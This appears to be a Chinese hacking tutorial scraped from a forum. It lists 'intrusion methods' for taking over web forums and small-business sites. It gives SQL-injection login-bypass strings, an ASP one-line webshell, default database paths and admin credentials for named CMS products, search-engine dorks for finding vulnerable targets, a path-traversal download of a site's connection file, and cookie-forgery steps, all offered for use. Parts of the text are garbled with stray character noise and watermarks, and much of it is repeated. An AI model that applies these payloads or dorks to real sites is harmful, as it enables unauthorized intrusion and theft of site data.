14種可利用的入侵方法
1.上傳漏洞
如果看到:選擇你要上傳的文件 [重新上傳]或者出現(xiàn)“請登陸后使用”,80%就有漏洞了!
有時上傳不一定會成功,這是因?yàn)镃ookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.
2.注入漏洞
字符過濾不嚴(yán)造成的
3.旁注,也就是跨站.
我們?nèi)肭帜痴緯r可能這個站堅固的無懈可擊,我們可以找下和這個站同一服務(wù)器的站點(diǎn),然后在利用這個站點(diǎn)用提權(quán),嗅探等方法來入侵我們要入侵的站點(diǎn)。
4.暴庫:把二級目錄中間的/換成%5c
5.’or’=’or’這是一個可以連接SQL的語名句.可以直接進(jìn)入后臺。我收集了一下。類似的還有:
’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’a’=’a
6.社會工程學(xué)。這個我們都知道吧。就是猜解。
7.寫入ASP格式數(shù)據(jù)庫。就是一句話木馬〈%execute request("value")%〉(數(shù)據(jù)庫必需得是ASP或ASA的后綴)
8.源碼利用:一些網(wǎng)站用的都是網(wǎng)上下載的源碼.有的站長很懶.什么也不改.
9.默認(rèn)數(shù)據(jù)庫/webshell路徑利用:這樣的網(wǎng)站很多/利人別人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:網(wǎng)站獵手 挖掘雞 明小子
10.查看目錄法:人一些網(wǎng)站可以斷開目錄,可以方問目錄。
210.37.95.65 images
11.工具溢出
12.搜索引擎利用:
(1).inurl:flasher_list.asp 默認(rèn)數(shù)據(jù)庫:database/flash.mdb 后臺/manager/
(2).找網(wǎng)站的管理后臺地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理 〈關(guān)鍵字很多,自已找〉
site:xxxx.cominurl:login
(3).查找access的數(shù)據(jù)庫,mssql、mysql的連接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
13.COOKIE詐騙:把自己的ID修改成管理員的,MD5密碼也修改成他的,用桂林老兵工具可以修改COOKIE。
14.利用常見的漏洞:如動網(wǎng)BBS
可以先用:dvbbs權(quán)限提升工具,使自已成為前臺管理員。
THEN,運(yùn)用:動網(wǎng)固頂貼工具,找個固頂貼,再取得COOKIES,這個要你自已做。我們可以用WSockExpert取得Cookies/NC包
這個我就不做了,網(wǎng)上教程多的是,自已下個看看。
工具:dvbbs權(quán)限提升工具 動網(wǎng)固頂貼工具
15.還有一些老漏洞。如IIS3,4的查看源碼,5的Delete
CGI,PHP的一些老洞,我就不說了啊。。太老了。沒有什么大用途?!?br>
#######################################
一般入侵思路
腳本注入(ASP PHP JSP)
1.腳本漏洞
其它腳本漏洞(上傳漏洞,跨站漏洞)
域名旁注
2.旁注
“IP”旁注
本地溢出
3.溢出漏洞
遠(yuǎn)程溢出
ARP欺騙
4.網(wǎng)絡(luò)竊聽
IP欺騙
5.社會工程學(xué)
一、入侵BBSXP系統(tǒng):
用到的工具:網(wǎng)站獵手 數(shù)據(jù)庫小助手 MD5密碼破解工具
n C g j'f D#f關(guān)鍵詞:廣告合作&F.N;n#e#K m
管理員登陸地址:BBS主頁
:l m;B K9N1a0p whackbbs.tech.topzj.com默認(rèn)數(shù)據(jù)庫地址:/DATABASE/BBSXP.MDB*K h;s
二、入侵動網(wǎng)論壇用到工具:網(wǎng)站獵手 數(shù)據(jù)庫小助手 MD5密碼破解工具
x#u e:l
關(guān)鍵詞:powered by dvbbs
&t.u W n F'qT/w |默認(rèn)數(shù)據(jù)庫地址:data/dvbbs7.mdb 或者Databackup/dvbbs7.mdb或者bbs/Databackup/dvbbs7.mdb
*f&R N ~+e3j;K n u K.|一流技術(shù)聯(lián)盟【HACKER】或者/bbs/Data/dvbbs7.mdb \ A P R5s W v k
管理員登陸地址:BBS主頁默認(rèn)管理員賬號密碼:admin admin888
F#e*Q"A h } x&b.uA'H9o O0V N u4m p/Q
$b K V;c X)X7`hackbbs.tech.topzj.com三、入侵新云系統(tǒng)hackbbs.tech.topzj.com#`5w0M#a*F w I
用到的工具:數(shù)據(jù)庫小助手 MD5密碼破解工具 挖掘雞 O1m ?0F r ^ L
關(guān)鍵詞:本站所提供的程序均來自于 Internet(所以無法保證下載后一定可以安裝管理員登陸地址:/admin/admin_login.asp
+p N q-N9m A7k4N默認(rèn)數(shù)據(jù)庫:database/#newasp.mdb(因?yàn)榧恿?在瀏覽器是無法連接的。所以我們要改成%23)hackbbs.tech.topzj.com c#M b9B x L$g M
database/%23newasp.mdb一流技術(shù)聯(lián)盟【HACKER】,i G A j Ik {
默認(rèn)管理員賬號密碼:admin admin
四、入侵無憂傳奇系統(tǒng)
【HACKER】用到的工具:網(wǎng)站獵手 數(shù)據(jù)庫小助手 MD5密碼破解工具
關(guān)鍵字: inurl:Msmir_DownLoads
\*? S'P4V(\
p一流技術(shù)聯(lián)盟【HACKER】默認(rèn)數(shù)據(jù)庫地址:數(shù)據(jù)庫連接:/msmir_net.mdb 或/msmir/msmir.mdb管理員登陸地址:admin.asp
/| o M a(}
[%C q | H4t默認(rèn)管理員賬號密碼:msmir msmir
o-L7^2K&z d6^ Dhackbbs.tech.topzj.com同上,得到管理員密碼后,再進(jìn)入后臺,發(fā)布新聞,用捉包工具捉包,再用NC提交,得到SHELL,一流技術(shù)聯(lián)盟【HACKER】*e k I;G$] v2D:_p i
u
b @ Y
五、入侵小公司小企業(yè)系統(tǒng)關(guān)鍵詞:inurl:Went.后臺登陸地址:manage/login.asp默認(rèn)管理員賬號密碼:'or''=''or' 'or''=''or' 一流技術(shù)聯(lián)盟【HACKER】 L&{"e(C v J l
或:admin admin入侵搜索關(guān)鍵字默認(rèn)數(shù)據(jù)庫: Databases/myszw.mdb Databases/myszw1.mdb
上傳 upload_Photo.asp?PhotoUrlID=3 upload_Photo.asp?PhotoUrlID=1
----------------------------------------------------
關(guān)鍵字:網(wǎng)站建設(shè)公司企業(yè)網(wǎng)站管理系統(tǒng)
后綴: admin/login.asp
---------------------------------------
關(guān)鍵字:網(wǎng)夢購物系統(tǒng) gCS木馬
GOOGLE里搜索關(guān)鍵字:
上面的這個名字只是該留言者使用的昵稱,不代表任何管理員身份!
把index.asp換成 mdb/vcsbook.asp
代碼:
---------------------------------------
關(guān)鍵子:inurl:Went.asp
后綴:manage/login.asp
密碼:'or''=''or'
============================
關(guān)鍵字:acblog
blogdata/acblog.asa 默認(rèn)數(shù)據(jù)庫。
=======================================
關(guān)鍵字:Copyright ? 2005-2008??Power
然后寫入默認(rèn)數(shù)據(jù)庫:databass/datashop.asp
在網(wǎng)址后面加上主頁后面加上:linktianjia.asp
申請連接輸入一句話代碼:
或者點(diǎn)下面的管理入口 密碼:'or'='or'
一句話連接的時候在網(wǎng)站后面加上:databass/datashop.asp
========================================================
關(guān)鍵詞 co net mib ver 1.0 design by hypo
搜索網(wǎng)站
==============================================
新云漏洞:把/flash/downfile.asp?url=uploadfile/../../conn.asp提交到網(wǎng)站根目錄。就可以下載conn.asp 找到數(shù)據(jù)庫地址比如 www.123.com 這個站那么數(shù)據(jù)庫地址就是 http://www.123.com/database\xzws.mdb 大家時常碰到數(shù)據(jù)庫如果前面或者中間+了# 可以用%23替換就可以下載了如:#xzws.mdb 改成%23xzws.mdb 那么數(shù)據(jù)庫就是
http://www.123.com/database\%23xzws.mdb然后下載數(shù)據(jù)庫
======================================================
網(wǎng)站獵手 一句話木馬
關(guān)鍵字:Powered by BBSXP 7.00
后綴:DataBase\BBSXP7.mdb
默認(rèn)后臺:/bbsxp/Login.asp
=====================================
關(guān)鍵字:Management Ver 3.0 Build 20030628
后綴:upload.asp
一:網(wǎng)站獵手 t0/fF'G ZD
二:明小子
三:ASP木馬 =DUs
====================
密碼:'or'='or'
搜索:WEB Manage Ver 1.0
LQT Ver 1.0 Design By wm 6
Web Development By Ver 1.0 Final
Web Management Ver 1.0 Design By Ck8
=====================================
edit.asp?table=
edit.asp?boardname=
action=
cnunews=
news_main&acode=
asp?id=1
asp?id=2
&idx=
edit.asp?idx=
啊D注入工具 百度搜索
=========================
搜索:Co Net MIB Ver 1.0網(wǎng)站后臺管理系統(tǒng)
===============================================
用到工具:挖掘雞
后綴添加:admin/login.asp
搜索關(guān)鍵詞:申請會員有什么好處?
密碼:'or'='or'
=================================
啊D注入工具--百度----關(guān)鍵子:admin
====================================
挖掘機(jī)關(guān)鍵字:Powered by WEBBOY頁面:/upfile.asp
網(wǎng)站獵手關(guān)鍵字:Powered by mypower 后綴:upfile_photo.asp
upfile_softpic.asp
upfile_adpic.asp
======================
關(guān)鍵字:Power BY:VenShop V7.01 Copyright:VenShop.Com
密碼:'or'='or'
======================= ;:
關(guān)鍵字:powered by mypower
漏洞頁面:upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp
===============================
關(guān)鍵字:選購->加入購物車->去收銀臺->確認(rèn)收貨人信息->選付款方式->選配送方式->在線支付或下單后匯款->匯款確認(rèn)->發(fā)貨->完成
漏洞頁面:upload.asp
upfile_flash.asp
=============================
網(wǎng)上搜索 inurl:manage/login.asp
======================================
關(guān)鍵字:Power BY:VenShop V7.01
后臺地址:ad_login.asp
密碼:'or'='or'
====================
關(guān)鍵字:Powered by WEBBOY
后綴:/upfile.asp
工具:明小子上傳
====================
關(guān)鍵詞:inurl: asp?=數(shù)字
inurl: php?=數(shù)字
===========================
關(guān)鍵字:went.asp
后綴:manage/login.asp
==========================
添加后綴/msmir_net.mdb
搜索:inurl:Msmir_DownLoads
===============================
關(guān)鍵字Powered By :SMT Version 5.0
后綴:upfile_flash.asp
===========================
關(guān)鍵字:你要入侵的類別 inurl:asp
工具:啊D注入工具
==================================
========================================
一、入侵BBSXP系統(tǒng):
用到的工具:網(wǎng)站獵手 數(shù)據(jù)庫小助手 MD5密碼破解工具
關(guān)鍵詞:廣告合作
管理員登陸地址:BBS主頁
默認(rèn)數(shù)據(jù)庫地址:/DATABASE/BBSXP.MDB
-----------------------------------------
二、入侵動網(wǎng)論壇
用到工具:網(wǎng)站獵手 數(shù)據(jù)庫小助手 MD5密碼破解工具
關(guān)鍵詞:powered by dvbbs
默認(rèn)數(shù)據(jù)庫地址:data/dvbbs7.mdb 或者Databackup/dvbbs7.mdb或者bbs/Databackup/dvbbs7.mdb
或者/bbs/Data/dvbbs7.mdb
管理員登陸地址:BBS主頁
默認(rèn)管理員賬號密碼:admin admin888
--------------------------------------
三、入侵新云系統(tǒng)
用到的工具:數(shù)據(jù)庫小助手 MD5密碼破解工具 挖掘雞 ?N 6'*2{NT
eIEr\X4\~~
關(guān)鍵詞:本站所提供的程序均來自于 Internet 所以無法保證下載后一定可以安裝
管理員登陸地址:/admin/admin_login.asp U
默認(rèn)數(shù)據(jù)庫:database/#newasp.mdb(因?yàn)榧恿?在瀏覽器是無法連接的。所以我們要改成%23)
database/%23newasp.mdb
默認(rèn)管理員賬號密碼:admin admin
-----------------------------------
四、入侵無憂傳奇系統(tǒng)
用到的工具:網(wǎng)站獵手 數(shù)據(jù)庫小助手 MD5密碼破解工具
關(guān)鍵字: inurl:Msmir_DownLoads
默認(rèn)數(shù)據(jù)庫地址:數(shù)據(jù)庫連接:/msmir_net.mdb 或/msmir/msmir.mdb
管理員登陸地址:admin.asp
默認(rèn)管理員賬號密碼:msmir msmir